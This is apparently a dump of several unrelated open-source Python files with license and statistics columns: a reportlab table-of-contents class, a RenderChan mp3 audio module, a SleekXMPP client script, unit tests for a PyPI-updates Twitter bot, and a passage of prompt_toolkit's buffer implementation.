b = BoxedContainer(self.content[:p], self.style, self.mode)
w, h = b.wrap(availWidth, availHeight)
if h < availHeight:
candidate = b
if self.content[p:]:
remainder = BoxedContainer(
self.content[p:], self.style, self.mode
)
else:
break
if not candidate or not remainder: # Nothing fits, break page
return []
if not remainder: # Everything fits?
return [self]
return [candidate, remainder]
class MyTableOfContents(TableOfContents):
"""
Subclass of reportlab.platypus.tableofcontents.TableOfContents
which supports hyperlinks to corresponding sections.
"""
def __init__(self, *args, **kwargs):
# The parent argument is to define the locality of
# the TOC. If it's none, it's a global TOC and
# any heading it's notified about is accepted.
# If it's a node, then the heading needs to be "inside"
# that node. This can be figured out because
# the heading flowable keeps a reference to the title
# node it was creatd from.
#
# Yes, this is gross.
self.parent = kwargs.pop('parent')
TableOfContents.__init__(self, *args, **kwargs)
# reference ids for which this TOC should be notified
self.refids = []
# revese lookup table from (level, text) to refid
self.refid_lut = {}
self.linkColor = "#0000ff"
def notify(self, kind, stuff):
# stuff includes (level, text, pagenum, label)
level, text, pageNum, label, node = stuff
rlabel = '-'.join(label.split('-')[:-1])
def islocal(_node):
"""See if this node is "local enough" for this TOC.
This is for Issue 196"""
if self.parent is None:
return True
while _node.parent:
if _node.parent == self.parent:
return True
_node = _node.parent
return False
if rlabel in self.refids and islocal(node):
self.addEntry(level, text, pageNum)
self.refid_lut[(level, text, pageNum)] = label
def wrap(self, availWidth, availHeight):
"""Adds hyperlink to toc entry."""
widths = (availWidth - self.rightColumnWidth, self.rightColumnWidth)
# makes an internal table which does all the work.
# we draw the LAST RUN's entries! If there are
# none, we make some dummy data to keep the table
# from complaining
if len(self._lastEntries) == 0:
_tempEntries = [(0, 'Placeholder for table of contents', 0, None)]
else:
_tempEntries = self._lastEntries
if _tempEntries:
base_level = _tempEntries[0][0]
else:
base_level = 0
tableData = []
for entry in _tempEntries:
level, text, pageNum = entry[:3]
left_col_level = level - base_level
leftColStyle = self.getLevelStyle(left_col_level)
label = self.refid_lut.get((level, text, pageNum), None)
if label:
pre = u'<a href="#%s" color="%s">' % (label, self.linkColor)
post = u'</a>'
if isinstance(text, bytes):
text = text.decode('utf-8')
text = pre + text + post
else:
pre = ''
post = ''
# right col style is right aligned
rightColStyle = ParagraphStyle(
name='leftColLevel%d' % left_col_level,
parent=leftColStyle,
leftIndent=0,
alignment=TA_RIGHT,
)
leftPara = Paragraph(text, leftColStyle)
rightPara = Paragraph(pre + str(pageNum) + post, rightColStyle)
tableData.append([leftPara, rightPara])
self._table = Table(tableData, colWidths=widths, style=self.tableStyle)
self.width, self.height = self._table.wrapOn(self.canv, availWidth, availHeight)
return self.width, self.height
def split(self, aW, aH):
# Make sure _table exists before splitting.
# This was only triggered in rare cases using sphinx.
if not self._table:
self.wrap(aW, aH)
return TableOfContents.split(self, aW, aH)
def isSatisfied(self):
if self._entries == self._lastEntries:
log.debug('Table Of Contents is stable')
return True
else:
if len(self._entries) != len(self._lastEntries):
log.info(
'Number of items in TOC changed '
'from %d to %d, not satisfied'
% (len(self._lastEntries), len(self._entries))
)
return False
log.info('TOC entries that moved in this pass:')
for i in range(len(self._entries)):
if self._entries[i] != self._lastEntries[i]:
log.info(str(self._entries[i]))
log.info(str(self._lastEntries[i]))
return False
|
mit
| 4,092,100,191,561,448,400
| 33.077739
| 91
| 0.495697
| false
| 4.132405
| false
| false
| false
|
scribblemaniac/RenderChan
|
renderchan/contrib/mp3.py
|
1
|
2027
|
__author__ = 'Konstantin Dmitriev'
from renderchan.module import RenderChanModule
from renderchan.utils import which
import subprocess
import os
import re
import random
class RenderChanMp3Module(RenderChanModule):
def __init__(self):
RenderChanModule.__init__(self)
if os.name == 'nt':
self.conf['binary']=os.path.join(os.path.dirname(__file__),"..\\..\\..\\packages\\mpg123\\mpg123.exe")
self.conf['sox_binary']=os.path.join(os.path.dirname(__file__),"..\\..\\..\\packages\\sox\\sox.exe")
else:
self.conf['binary']="mpg123"
self.conf['sox_binary']="sox"
self.conf["packetSize"]=0
def getInputFormats(self):
return ["mp3"]
def getOutputFormats(self):
return ["wav"]
def checkRequirements(self):
if which(self.conf['binary']) == None:
self.active=False
print("Module warning (%s): Cannot find '%s' executable." % (self.getName(), self.conf['binary']))
print(" Please install mpg123 package.")
return False
if which(self.conf['sox_binary']) == None:
self.active=False
print("Module warning (%s): Cannot find '%s' executable!" % (self.getName(), self.conf['sox_binary']))
print(" Please install sox package.")
return False
self.active=True
return True
def render(self, filename, outputPath, startFrame, endFrame, format, updateCompletion, extraParams={}):
comp = 0.0
updateCompletion(comp)
random_string = "%08d" % (random.randint(0,99999999))
tmpfile=outputPath+"."+random_string
# TODO: Progress callback
commandline=[self.conf['binary'], "-w", tmpfile, filename]
subprocess.check_call(commandline)
commandline=[self.conf['sox_binary'], tmpfile, outputPath, "rate", "-v", extraParams["audio_rate"]]
subprocess.check_call(commandline)
os.remove(tmpfile)
updateCompletion(1.0)
|
bsd-3-clause
| -5,324,836,554,297,819,000
| 32.229508
| 114
| 0.601381
| false
| 3.839015
| false
| false
| false
|
flosse/hello-xmpp
|
python/sleekxmpp/client.py
|
1
|
1260
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import logging
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
from sleekxmpp.util.misc_ops import setdefaultencoding
setdefaultencoding('utf8')
else:
raw_input = input
if __name__ == '__main__':
# check arguments
if len(sys.argv) < 5:
print("Usage: python client.py <my-jid> <my-password> <my-text> <jid1>")
sys.exit(1)
# Setup logging.
logging.basicConfig(level="DEBUG", format='%(levelname)-8s %(message)s')
to = sys.argv[4]
msg = sys.argv[3]
# create a new xmpp client
xmpp = sleekxmpp.ClientXMPP(sys.argv[1], sys.argv[2])
# define a handler function
def onStart(ev):
print("connected")
xmpp.send_message(mto=to, mbody=msg, mtype='chat')
xmpp.disconnect(wait=True)
# add the function
xmpp.add_event_handler("session_start", onStart)
# connect to the XMPP server
if xmpp.connect():
xmpp.process(block=True)
print("Disconnected")
else:
print("Unable to connect.")
|
mit
| -9,118,855,012,749,246,000
| 25.25
| 80
| 0.642063
| false
| 3.342175
| false
| false
| false
|
tell-k/pypi-updates
|
tests/test_bot.py
|
1
|
11603
|
# -*- coding: utf-8 -*-
"""
unit test for PypiUpdatesBot
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:author: tell-k <ffk2005@gmail.com>
:copyright: tell-k. All Rights Reserved.
"""
import mock
import pytest
import logbook
class DummyMemcache(object):
def __init__(self):
self._data = {}
def set(self, key, value):
self._data.update({key: value})
def get(self, key):
return self._data.get(key)
class DummyTweepyAPI(object):
def update_status(self, message):
pass
class TestPypiUpdatesBot(object):
def _get_target_class(self):
from pypi_updates import PypiUpdatesBot
return PypiUpdatesBot
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
def test_tweepy_api(self):
target_obj = self._make_one()
assert target_obj.tweepy_api is not None
# same instance check
assert target_obj.tweepy_api is target_obj.tweepy_api
@mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=DummyMemcache())
def test_memcache(self, mock_memcache):
target_obj = self._make_one()
assert target_obj.memcache is not None
# same instance check
assert target_obj.memcache is target_obj.memcache
@mock.patch('pypi_updates.bot.feedparser.parse', return_value=None)
def test_canot_parse_feed(self, mock):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
with logbook.TestHandler() as log_handler:
update_status(target_obj)
expected = [
'[WARNING] [kuroko user]: Cannot parse RSS: {}'.format(RSS_URL)
]
assert log_handler.formatted_records == expected
mock.assert_called_with(RSS_URL)
@mock.patch('pypi_updates.bot.feedparser.parse',
return_value={'items': []})
def test_canot_parse_items(self, mock):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
with logbook.TestHandler() as log_handler:
update_status(target_obj)
assert log_handler.formatted_records == [
'[WARNING] [kuroko user]: Cannot parse RSS: {}'.format(RSS_URL)
]
mock.assert_called_with(RSS_URL)
@mock.patch('pypi_updates.bot.pylibmc.Client', return_value=DummyMemcache())
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_update_status(self, mock_memcache, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
{
'title': 'dummy2',
'link': 'http://example.com/2/',
'description': 'dummydesc2',
'published': '09 Oct 2014 15:18:59 GMT'
},
]
}
m_parse = mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed)
with logbook.TestHandler() as log_handler, m_parse as m:
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009151858',
u'[INFO] [kuroko user]: dummy http://example.com/1/',
u'[INFO] [kuroko user]: dummy2 http://example.com/2/',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_already_set_latest_published(self, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
{
'title': 'dummy2',
'link': 'http://example.com/2/',
'description': 'dummydesc2',
'published': '09 Oct 2014 15:18:59 GMT'
},
]
}
dummy_memcache = DummyMemcache()
dummy_memcache.set('latest_published', '20141009151859')
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m,\
mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=dummy_memcache):
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009151859',
u'[INFO] [kuroko user]: dummy http://example.com/1/',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
def test_skip_old_tweet(self):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
]
}
dummy_memcache = DummyMemcache()
dummy_memcache.set('latest_published', '20141009153126')
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m,\
mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=dummy_memcache):
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009153126',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
@mock.patch('pypi_updates.bot.pylibmc.Client', return_value=DummyMemcache())
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_tweet_over_length(self, mock_memcache, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'a' * 109, # truncate
'link': 'http://example.com/1/',
'description': 'a' * 126, # truncate
'published': '09 Oct 2014 15:31:26 GMT'
},
{
'title': 'a' * 108, # not truncate
'link': 'http://example.com/2/',
'description': 'a' * 125, # not truncate
'published': '09 Oct 2014 15:18:59 GMT'
},
]
}
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m:
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009151858',
u'[INFO] [kuroko user]: {}... http://example.com/1/'.format(u'a' * 105),
u'[INFO] [kuroko user]: {} http://example.com/2/'.format(u'a' * 108),
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
@mock.patch('pypi_updates.bot.pylibmc.Client', return_value=DummyMemcache())
def test_raise_tweepy_error(self, mock_memcache):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
]
}
def _update_status_error(message):
import tweepy
raise tweepy.TweepError(reason='error')
dummy_tweepy_api = DummyTweepyAPI()
dummy_tweepy_api.update_status = _update_status_error
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m,\
mock.patch('pypi_updates.bot.tweepy.API',
return_value=dummy_tweepy_api):
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009153125',
u'[INFO] [kuroko user]: dummy http://example.com/1/',
u'[ERROR] [kuroko user]: error'
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153125'
@mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=DummyMemcache())
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_multibyte_language(self, mock_memcache, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': u'是假的數據',
'link': 'http://example.com/1/',
'description': u'是假的數據',
'published': '09 Oct 2014 15:31:26 GMT'
},
]
}
m_parse = mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed)
with logbook.TestHandler() as log_handler, m_parse as m:
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009153125',
u'[INFO] [kuroko user]: 是假的數據 http://example.com/1/',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
class TestIsValidMessage(object):
def _call_fut(self, msg):
from pypi_updates.bot import is_valid_message
return is_valid_message(msg)
@pytest.mark.parametrize('msg', [
'new pypi packages',
])
def test_valid_case(self, msg):
assert self._call_fut(msg)
@pytest.mark.parametrize('msg', [
'kissanime',
'new kissanime',
])
def test_invalid_case(self, msg):
assert not self._call_fut(msg)
|
mit
| 1,637,907,340,961,301,500
| 34.719136
| 84
| 0.536421
| false
| 3.818212
| true
| false
| false
|
ALSchwalm/python-prompt-toolkit
|
prompt_toolkit/buffer.py
|
1
|
40824
|
"""
Data structures for the Buffer.
It holds the text, cursor position, history, etc...
"""
from __future__ import unicode_literals
from .completion import Completer, Completion, CompleteEvent
from .document import Document
from .enums import IncrementalSearchDirection
from .history import History, InMemoryHistory
from .selection import SelectionType, SelectionState
from .utils import Callback
from .validation import ValidationError
from .clipboard import ClipboardData
from .filters import Never, to_simple_filter
from .search_state import SearchState
import os
import six
import subprocess
import tempfile
__all__ = (
'EditReadOnlyBuffer',
'AcceptAction',
'Buffer',
'indent',
'unindent',
)
class EditReadOnlyBuffer(Exception):
" Attempt editing of read-only buffer. "
class AcceptAction(object):
"""
What to do when the input is accepted by the user.
(When Enter was pressed in the command line.)
:param handler: (optional) A callable which accepts a CLI and `Document'
that is called when the user accepts input.
:param render_cli_done: When using a handler, first render the CLI in the
'done' state, then call the handler. This
"""
def __init__(self, handler=None):
assert handler is None or callable(handler)
self.handler = handler
@classmethod
def run_in_terminal(cls, handler, render_cli_done=False):
"""
Create an `AcceptAction` that runs the given handler in the terminal.
:param render_cli_done: When True, render the interface in the 'Done'
state first, then execute the function. If False, erase the
interface instead.
"""
def _handler(cli, buffer):
cli.run_in_terminal(lambda: handler(cli, buffer), render_cli_done=render_cli_done)
return AcceptAction(handler=_handler)
@property
def is_returnable(self):
"""
True when there is something handling accept.
"""
return bool(self.handler)
def validate_and_handle(self, cli, buffer):
"""
Validate buffer and handle the accept action.
"""
if buffer.validate():
if self.handler:
self.handler(cli, buffer)
buffer.append_to_history()
def _return_document_handler(cli, buffer):
cli.set_return_value(buffer.document)
AcceptAction.RETURN_DOCUMENT = AcceptAction(_return_document_handler)
AcceptAction.IGNORE = AcceptAction(handler=None)
class CompletionState(object):
"""
Immutable class that contains a completion state.
"""
def __init__(self, original_document, current_completions=None, complete_index=None):
#: Document as it was when the completion started.
self.original_document = original_document
#: List of all the current Completion instances which are possible at
#: this point.
self.current_completions = current_completions or []
#: Position in the `current_completions` array.
#: This can be `None` to indicate "no completion", the original text.
self.complete_index = complete_index # Position in the `_completions` array.
def __repr__(self):
return '%s(%r, <%r> completions, index=%r)' % (
self.__class__.__name__,
self.original_document, len(self.current_completions), self.complete_index)
def go_to_index(self, index):
"""
Create a new CompletionState object with the new index.
"""
return CompletionState(self.original_document, self.current_completions, complete_index=index)
def new_text_and_position(self):
"""
Return (new_text, new_cursor_position) for this completion.
"""
if self.complete_index is None:
return self.original_document.text, self.original_document.cursor_position
else:
original_text_before_cursor = self.original_document.text_before_cursor
original_text_after_cursor = self.original_document.text_after_cursor
c = self.current_completions[self.complete_index]
if c.start_position == 0:
before = original_text_before_cursor
else:
before = original_text_before_cursor[:c.start_position]
new_text = before + c.text + original_text_after_cursor
new_cursor_position = len(before) + len(c.text)
return new_text, new_cursor_position
@property
def current_completion(self):
"""
Return the current completion, or return `None` when no completion is
selected.
"""
if self.complete_index is not None:
return self.current_completions[self.complete_index]
class Buffer(object):
"""
The core data structure that holds the text and cursor position of the
current input line and implements all text manupulations on top of it. It
also implements the history, undo stack and the completion state.
:attr completer : :class:`~prompt_toolkit.completion.Completer` instance.
:attr history: :class:`~prompt_toolkit.history.History` instance.
:attr callbacks: :class:`~.Callbacks` instance.
:attr tempfile_suffix: Suffix to be appended to the tempfile for the 'open
in editor' function.
:attr is_multiline: SimpleFilter to indicate whether we should consider
this buffer a multiline input. If so, key bindings can
decide to insert newlines when pressing [Enter].
(Instead of accepting the input.)
:param complete_while_typing: Filter instance. Decide whether or not to do
asynchronous autocompleting while typing.
:param on_text_changed: Callback instance or None.
:param on_text_insert: Callback instance or None.
:param on_cursor_position_changed: Callback instance or None.
:param enable_history_search: SimpleFilter to indicate when up-arrow partial
string matching is enabled. It is adviced to not enable this at the
same time as `complete_while_typing`, because when there is an
autocompletion found, the up arrows usually browse through the
completions, rather than through the history.
"""
def __init__(self, completer=None, history=None, validator=None, tempfile_suffix='',
is_multiline=Never(), complete_while_typing=Never(),
enable_history_search=Never(), initial_document=None,
accept_action=AcceptAction.RETURN_DOCUMENT, read_only=False,
on_text_changed=None, on_text_insert=None, on_cursor_position_changed=None):
# Accept both filters and booleans as input.
enable_history_search = to_simple_filter(enable_history_search)
is_multiline = to_simple_filter(is_multiline)
complete_while_typing = to_simple_filter(complete_while_typing)
read_only = to_simple_filter(read_only)
# Validate input.
assert completer is None or isinstance(completer, Completer)
assert history is None or isinstance(history, History)
assert on_text_changed is None or isinstance(on_text_changed, Callback)
assert on_text_insert is None or isinstance(on_text_insert, Callback)
assert on_cursor_position_changed is None or isinstance(on_cursor_position_changed, Callback)
self.completer = completer
self.validator = validator
self.tempfile_suffix = tempfile_suffix
self.accept_action = accept_action
# Filters. (Usually, used by the key bindings to drive the buffer.)
self.is_multiline = is_multiline
self.complete_while_typing = complete_while_typing
self.enable_history_search = enable_history_search
self.read_only = read_only
#: The command buffer history.
# Note that we shouldn't use a lazy 'or' here. bool(history) could be
# False when empty.
self.history = InMemoryHistory() if history is None else history
self.__cursor_position = 0
# Events
self.on_text_changed = on_text_changed or Callback()
self.on_text_insert = on_text_insert or Callback()
self.on_cursor_position_changed = on_cursor_position_changed or Callback()
self.reset(initial_document=initial_document)
def reset(self, initial_document=None, append_to_history=False):
"""
:param append_to_history: Append current input to history first.
"""
assert initial_document is None or isinstance(initial_document, Document)
if append_to_history:
self.append_to_history()
initial_document = initial_document or Document()
self.__cursor_position = initial_document.cursor_position
# `ValidationError` instance. (Will be set when the input is wrong.)
self.validation_error = None
# State of the selection.
self.selection_state = None
# State of complete browser
self.complete_state = None # For interactive completion through Ctrl-N/Ctrl-P.
# The history search text. (Used for filtering the history when we
# browse through it.)
self.history_search_text = None
# Undo/redo stacks
self._undo_stack = [] # Stack of (text, cursor_position)
self._redo_stack = []
#: The working lines. Similar to history, except that this can be
#: modified. The user can press arrow_up and edit previous entries.
#: Ctrl-C should reset this, and copy the whole history back in here.
#: Enter should process the current command and append to the real
#: history.
self._working_lines = self.history.strings[:]
self._working_lines.append(initial_document.text)
self.__working_index = len(self._working_lines) - 1
# <getters/setters>
def _set_text(self, value):
""" set text at current working_index. Return whether it changed. """
original_value = self._working_lines[self.working_index]
self._working_lines[self.working_index] = value
return value != original_value
def _set_cursor_position(self, value):
""" Set cursor position. Return whether it changed. """
original_position = self.__cursor_position
self.__cursor_position = max(0, value)
return value != original_position
@property
def text(self):
return self._working_lines[self.working_index]
@text.setter
def text(self, value):
"""
Setting text. (When doing this, make sure that the cursor_position is
valid for this text. text/cursor_position should be consistent at any time,
otherwise set a Document instead.)
"""
assert isinstance(value, six.text_type), 'Got %r' % value
assert self.cursor_position <= len(value)
# Don't allow editing of read-only buffers.
if self.read_only():
raise EditReadOnlyBuffer()
changed = self._set_text(value)
if changed:
self._text_changed()
# Reset history search text.
self.history_search_text = None
@property
def cursor_position(self):
return self.__cursor_position
@cursor_position.setter
def cursor_position(self, value):
"""
Setting cursor position.
"""
assert isinstance(value, int)
assert value <= len(self.text)
changed = self._set_cursor_position(value)
if changed:
self._cursor_position_changed()
@property
def working_index(self):
return self.__working_index
@working_index.setter
def working_index(self, value):
if self.__working_index != value:
self.__working_index = value
self._text_changed()
def _text_changed(self):
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
self.selection_state = None
# fire 'on_text_changed' event.
self.on_text_changed.fire()
def _cursor_position_changed(self):
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
# Note that the cursor position can change if we have a selection the
# new position of the cursor determines the end of the selection.
# fire 'on_cursor_position_changed' event.
self.on_cursor_position_changed.fire()
@property
def document(self):
"""
Return :class:`Document` instance from the current text and cursor
position.
"""
return Document(self.text, self.cursor_position, selection=self.selection_state)
@document.setter
def document(self, value):
"""
Set :class:`Document` instance.
This will set both the text and cursor position at the same time, but
atomically. (Change events will be triggered only after both have been set.)
"""
assert isinstance(value, Document)
# Don't allow editing of read-only buffers.
if self.read_only():
raise EditReadOnlyBuffer()
# Set text and cursor position first.
text_changed = self._set_text(value.text)
cursor_position_changed = self._set_cursor_position(value.cursor_position)
# Now handle change events. (We do this when text/cursor position is
# both set and consistent.)
if text_changed:
self._text_changed()
if cursor_position_changed:
self._cursor_position_changed()
# End of <getters/setters>
def save_to_undo_stack(self, clear_redo_stack=True):
"""
Safe current state (input text and cursor position), so that we can
restore it by calling undo.
"""
# Safe if the text is different from the text at the top of the stack
# is different. If the text is the same, just update the cursor position.
if self._undo_stack and self._undo_stack[-1][0] == self.text:
self._undo_stack[-1] = (self._undo_stack[-1][0], self.cursor_position)
else:
self._undo_stack.append((self.text, self.cursor_position))
# Saving anything to the undo stack, clears the redo stack.
if clear_redo_stack:
self._redo_stack = []
def transform_lines(self, line_index_iterator, transform_callback):
"""
Transforms the text on a range of lines.
When the iterator yield an index not in the range of lines that the
document contains, it skips them silently.
To uppercase some lines::
new_text = transform_lines(range(5,10), lambda text: text.upper())
:param line_index_iterator: Iterator of line numbers (int)
:param transform_callback: callable that takes the original text of a
line, and return the new text for this line.
:returns: The new text.
"""
# Split lines
lines = self.text.split('\n')
# Apply transformation
for index in line_index_iterator:
try:
lines[index] = transform_callback(lines[index])
except IndexError:
pass
return '\n'.join(lines)
def transform_region(self, from_, to, transform_callback):
"""
Transform a part of the input string.
:param :from_: (int) start position.
:param :to: (int) end position.
:param :transform_callback: Callable which accepts a string and returns
the transformed string.
"""
assert from_ < to
self.text = ''.join([
self.text[:from_] +
transform_callback(self.text[from_:to]) +
self.text[to:]
])
def cursor_left(self, count=1):
self.cursor_position += self.document.get_cursor_left_position(count=count)
def cursor_right(self, count=1):
self.cursor_position += self.document.get_cursor_right_position(count=count)
def cursor_up(self, count=1):
""" (for multiline edit). Move cursor to the previous line. """
self.cursor_position += self.document.get_cursor_up_position(count=count)
def cursor_down(self, count=1):
""" (for multiline edit). Move cursor to the next line. """
self.cursor_position += self.document.get_cursor_down_position(count=count)
def auto_up(self, count=1):
"""
If we're not on the first line (of a multiline input) go a line up,
otherwise go back in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_previous(count=count)
elif self.document.cursor_position_row > 0:
self.cursor_position += self.document.get_cursor_up_position(count=count)
elif not self.selection_state:
self.history_backward(count=count)
def auto_down(self, count=1):
"""
If we're not on the last line (of a multiline input) go a line down,
otherwise go forward in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_next(count=count)
elif self.document.cursor_position_row < self.document.line_count - 1:
self.cursor_position += self.document.get_cursor_down_position(count=count)
elif not self.selection_state:
self.history_forward(count=count)
def delete_before_cursor(self, count=1):
"""
Delete character before cursor, return deleted character.
"""
assert count >= 0
deleted = ''
if self.cursor_position > 0:
deleted = self.text[self.cursor_position - count:self.cursor_position]
new_text = self.text[:self.cursor_position - count] + self.text[self.cursor_position:]
new_cursor_position = self.cursor_position - len(deleted)
# Set new Document atomically.
self.document = Document(new_text, new_cursor_position)
return deleted
def delete(self, count=1):
"""
Delete one character. Return deleted character.
"""
if self.cursor_position < len(self.text):
deleted = self.document.text_after_cursor[:count]
self.text = self.text[:self.cursor_position] + \
self.text[self.cursor_position + len(deleted):]
return deleted
else:
return ''
def join_next_line(self):
"""
Join the next line to the current one by deleting the line ending after
the current line.
"""
if not self.document.on_last_line:
self.cursor_position += self.document.get_end_of_line_position()
self.delete()
# Remove spaces.
self.text = (self.document.text_before_cursor + ' ' +
self.document.text_after_cursor.lstrip(' '))
def join_selected_lines(self):
"""
Join the selected lines.
"""
assert self.selection_state
# Get lines.
from_, to = self.document.selection_range()
before = self.text[:from_]
lines = self.text[from_:to].splitlines()
after = self.text[to:]
# Replace leading spaces with just one space.
lines = [l.lstrip(' ') + ' ' for l in lines]
# Set new document.
self.document = Document(text=before + ''.join(lines) + after,
cursor_position=len(before + ''.join(lines[:-1])) - 1)
def swap_characters_before_cursor(self):
"""
Swap the last two characters before the cursor.
"""
pos = self.cursor_position
if pos >= 2:
a = self.text[pos - 2]
b = self.text[pos - 1]
self.text = self.text[:pos-2] + b + a + self.text[pos:]
def go_to_history(self, index):
"""
Go to this item in the history.
"""
if index < len(self._working_lines):
self.working_index = index
self.cursor_position = len(self.text)
def complete_next(self, count=1):
"""
Browse to the next completions.
(Does nothing if there are no completion.)
"""
if self.complete_state:
completions_count = len(self.complete_state.current_completions)
if self.complete_state.complete_index is None:
index = 0
elif self.complete_state.complete_index == completions_count - 1:
index = None
else:
index = min(completions_count-1, self.complete_state.complete_index + count)
self._go_to_completion(index)
def complete_previous(self, count=1):
"""
Browse to the previous completions.
(Does nothing if there are no completion.)
"""
if self.complete_state:
if self.complete_state.complete_index == 0:
index = None
elif self.complete_state.complete_index is None:
index = len(self.complete_state.current_completions) - 1
else:
index = max(0, self.complete_state.complete_index - count)
self._go_to_completion(index)
def cancel_completion(self):
"""
Cancel completion, go back to the original text.
"""
if self.complete_state:
self._go_to_completion(None)
self.complete_state = None
def set_completions(self, completions, go_to_first=True, go_to_last=False):
"""
Start completions. (Generate list of completions and initialize.)
"""
assert not (go_to_first and go_to_last)
# Generate list of all completions.
if completions is None:
if self.completer:
completions = list(self.completer.get_completions(
self.document,
CompleteEvent(completion_requested=True)
))
else:
completions = []
# Set `complete_state`.
if completions:
self.complete_state = CompletionState(
original_document=self.document,
current_completions=completions)
if go_to_first:
self._go_to_completion(0)
elif go_to_last:
self._go_to_completion(len(completions) - 1)
else:
self._go_to_completion(None)
else:
self.complete_state = None
def start_history_lines_completion(self):
"""
Start a completion based on all the other lines in the document and the
history.
"""
found_completions = set()
completions = []
# For every line of the whole history, find matches with the current line.
current_line = self.document.current_line_before_cursor.lstrip()
for i, string in enumerate(self._working_lines):
for j, l in enumerate(string.split('\n')):
l = l.strip()
if l and l.startswith(current_line):
# When a new line has been found.
if l not in found_completions:
found_completions.add(l)
# Create completion.
if i == self.working_index:
display_meta = "Current, line %s" % (j+1)
else:
display_meta = "History %s, line %s" % (i+1, j+1)
completions.append(Completion(
l,
start_position=-len(current_line),
display_meta=display_meta))
self.set_completions(completions=completions[::-1])
def _go_to_completion(self, index):
"""
Select a completion from the list of current completions.
"""
assert self.complete_state
# Set new completion
state = self.complete_state.go_to_index(index)
# Set text/cursor position
new_text, new_cursor_position = state.new_text_and_position()
self.document = Document(new_text, new_cursor_position)
# (changing text/cursor position will unset complete_state.)
self.complete_state = state
def _set_history_search(self):
""" Set `history_search_text`. """
if self.enable_history_search():
if self.history_search_text is None:
self.history_search_text = self.text
else:
self.history_search_text = None
def _history_matches(self, i):
"""
True when the current entry matches the history search.
(when we don't have history search, it's also True.)
"""
return (self.history_search_text is None or
self._working_lines[i].startswith(self.history_search_text))
def history_forward(self, count=1):
"""
Move forwards through the history.
:param count: Amount of items to move forward.
:param history_search: When True, filter history using self.history_search_text.
"""
self._set_history_search()
# Go forward in history.
found_something = False
for i in range(self.working_index + 1, len(self._working_lines)):
if self._history_matches(i):
self.working_index = i
count -= 1
found_something = True
if count == 0:
break
# If we found an entry, move cursor to the end of the first line.
if found_something:
self.cursor_position = 0
self.cursor_position += self.document.get_end_of_line_position()
def history_backward(self, count=1):
"""
Move backwards through history.
"""
self._set_history_search()
# Go back in history.
